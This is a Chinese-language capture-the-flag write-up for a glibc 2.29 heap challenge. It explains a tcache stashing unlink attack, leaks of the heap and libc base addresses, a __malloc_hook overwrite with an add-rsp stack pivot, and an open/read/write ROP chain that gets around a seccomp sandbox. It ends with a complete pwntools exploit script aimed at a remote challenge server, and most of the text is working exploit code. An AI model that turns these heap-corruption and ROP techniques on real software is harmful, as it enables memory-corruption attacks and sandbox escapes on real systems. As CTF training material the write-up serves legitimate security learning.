首先，size为0x100的chunk(符合程序的条件下，随便多大的chunk都行)个数填充为6，这样就只需要两个smallbin就能实现tcache stashing unlink attack ，一个给用户申请走（进行完整性检查），一个unlink后进入tcache。

构造两个一样大的0x100的smallbin：

在这里插入图片描述

其次，修改第二个bin的bk指针，同时保证第一个bin的链的完整性 （堆申请好后，fd值与堆的基地址偏移是固定的）：

最后将0x7f，写入到tcache中0x220bin的count处：

最后在栈上构造ROP读取flag即可（绕过沙箱）由于add函数是先往栈上读数据，再cpy到堆上，所以可以先将ORW读到栈上，然后在calloc时再利用malloc_hook调整栈去执行ORW：


pop_rdi_ret=libc_base+0x000000000002155f
pop_rdx_ret=libc_base+0x0000000000001b96
pop_rax_ret=libc_base+0x00000000000439c8
pop_rsi_ret=libc_base+0x0000000000023e6a
addsp48_addr = libc_base+0x000000000008a1c6
ret=libc_base+0x00000000000008aa

open_addr = libc.sym['open']+libc_base
read_addr = libc.sym['read']+libc_base
write_addr = libc.sym['write']+libc_base    
syscall = read_addr+15
flag = heap_base+0x6e0

# open(0,flag)
orw =p64(pop_rdi_ret)+p64(flag)
orw+=p64(pop_rsi_ret)+p64(0)
orw+=p64(pop_rax_ret)+p64(2)
orw+=p64(syscall)			#需要使用系统调用syscall，前面直接查出来的open被沙盒搬掉了
# orw =p64(pop_rdi_ret)+p64(flag)
# orw+=p64(pop_rsi_ret)+p64(0)
# orw+=p64(open_addr)		#前面直接查出来的openat被沙盒搬掉了

# read(3,heap+0x1010,0x30) 
orw+=p64(pop_rdi_ret)+p64(3)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(read_addr)     

# write(1,heap+0x1010,0x30)
orw+=p64(pop_rdi_ret)+p64(1)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)#存放地址0x50
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(write_addr)

#往malloc上写数据
backdoor(b"aaaa")
backdoor(p64(addsp48_addr))		# 确定栈的偏移为0x48

调试：在进入calloc，访问到malloc_hook后，确定此时ORW在栈上相比与当前栈顶(sp值)的距离。随便给malloc_hook一个地址，在进入calloc之前打上断点：

确定栈上的偏移，存储的ORW肯定在栈的高地址处（因为calloc函数是在add函数里面又调用的，所以calloc的栈肯定在低地址）：

确定栈的偏移是+0x48，所以往malloc_hook的位置写一条add rsp,0x48的指令地址即可：

完整EXP：

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

def debug():
    print(proc.pidof(p))
    pause()

p = remote("node5.buuoj.cn",26347)
# p = process("./pwn")
# p = gdb.debug("./pwn")
libc = ELF('./libc-2.29.so')
elf = ELF("./pwn")

def add(index,content):
    p.sendlineafter(b'>','1')
    p.sendlineafter(b':',str(index))
    p.sendlineafter(b':',content)

def edit(index, content):
    p.sendlineafter(b'>','2')
    p.sendlineafter(b':',str(index).encode())
    # p.sendlineafter(':',str(len(content)))
    p.sendlineafter(b':',content)

def show(index):
    p.sendlineafter(b'>',b'3')
    p.sendlineafter(b':',str(index).encode())

def free(index):
    p.sendlineafter(b'>','4')
    p.sendlineafter(b':',str(index).encode())

def backdoor(content):
    p.sendlineafter(b">",b"50056")
    p.sendline(content)

for i in range(0,7):
    add(0,b"a"*0x87)
    free(0)
show(0)
p.recvuntil(b"hero name: ")
heap_base = u64(p.recv(6).ljust(8,b"\x00"))&0xfffffffff000
success("heap_base==>"+hex(heap_base))

add(0,b"a"*0x87)
add(1,b"./flag"+b"\x00"*(0x87-6))
free(0)
show(0)
#泄漏main_arena中的地址
p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
 
#计算__free_hook和system地址
malloc_hook_addr = libc_base+libc.sym["__malloc_hook"]
success("malloc_hook_addr==>"+hex(malloc_hook_addr))
system_addr = libc_base+libc.sym["system"]
free_hook_addr = libc_base+libc.sym["__free_hook"]
success("system_addr==>"+hex(system_addr))
success("free_hook_addr==>"+hex(free_hook_addr))
# pause()


# 利用tcache stashing unlink attack 将tcache中size为0x220的chunk个数变大
# 将tcache中size为0x220的chunk个数填充2个,修改next指针，为后面利用后门做铺垫

add(0,b"a"*0x217)
for i in range(2):
    free(0)
    edit(0,p64(0)*2)
edit(0,p64(malloc_hook_addr))

#进行tcache stashing unlink attack
add(0,b"a"*0xf0)
for i in range(6):  #留一个空间进行
    free(0)
    edit(0,p64(0)*2)

# 构造small bin
add(0,b"a"*0x400)
for i in range(7):
    free(0)
    edit(0,p64(0)*2)

add(0,b"a"*0x400)   #smallbin1 0x100
add(1,b"a"*0x400)
free(0)
add(0,b"a"*0x300)
add(1,b"a"*0x300)  

add(1,b"a"*0x400)   #smallbin2 0x100
add(2,b"a"*0x400)
free(1)
add(2,b"a"*0x300)
add(2,b"a"*0x300)   

#修改bk指针
fd = heap_base+0x11a0
bk = heap_base+0x20-5
payload1 = b"A"*0x300 + p64(0) + p64(0x101) + p64(fd) + p64(bk)
edit(1,payload1)
add(0,b"a"*0xf0)

#最后在栈上构造ROP读取flag
# 准备ORW
pop_rdi_ret=libc_base+0x0000000000026542
pop_rdx_ret=libc_base+0x000000000012bda6
pop_rax_ret=libc_base+0x0000000000047cf8
pop_rsi_ret=libc_base+0x0000000000026f9e
addsp48_addr = libc_base+0x000000000008cfd6
ret=libc_base+0x000000000002535f

open_addr = libc.sym['open']+libc_base
read_addr = libc.sym['read']+libc_base
write_addr = libc.sym['write']+libc_base    
syscall = read_addr+15
flag = heap_base+0x6e0

# open(0,flag)
orw =p64(pop_rdi_ret)+p64(flag)
orw+=p64(pop_rsi_ret)+p64(0)
orw+=p64(pop_rax_ret)+p64(2)
orw+=p64(syscall)
# orw =p64(pop_rdi_ret)+p64(flag)
# orw+=p64(pop_rsi_ret)+p64(0)
# orw+=p64(open_addr)

# read(3,heap+0x1010,0x30) 
orw+=p64(pop_rdi_ret)+p64(3)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(read_addr)     

# write(1,heap+0x1010,0x30)
orw+=p64(pop_rdi_ret)+p64(1)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)#存放地址0x50
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(write_addr)

#往malloc上写数据
backdoor(b"aaaa")
backdoor(p64(addsp48_addr))
add(1,orw)
p.interactive()